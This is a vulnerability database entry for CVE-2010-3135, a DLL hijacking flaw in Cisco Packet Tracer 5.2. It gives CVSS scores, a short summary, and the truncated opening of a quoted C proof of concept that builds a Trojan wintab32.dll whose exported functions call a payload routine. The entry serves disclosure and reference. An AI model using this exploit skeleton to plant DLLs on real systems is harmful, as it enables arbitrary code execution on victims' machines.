9.3
CVSSv2

CVE-2010-3135

Published: 26/08/2010 Updated: 17/08/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Untrusted search path vulnerability in Cisco Packet Tracer 5.2 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wintab32.dll that is located in the same folder as a .pkt or .pkz file.

Vulnerable Product Search on Vulmon Subscribe to Product

cisco packet tracer 5.2

Exploits

/* Title: Cisco Packet Tracer 52 DLL Hijacking Exploit (wintab32dll) Date:05/08/2010 Author: CCNA Tested on: Windows XP SP 2 Extension: pkt pkz Greets: xokaido, hex, hektor, classical */ #include <windowsh> #define DllExport __declspec (dllexport) DllExport void WTInfoA() { theCode(); } DllExport void WTOpenA() { theCode(); } DllExport ...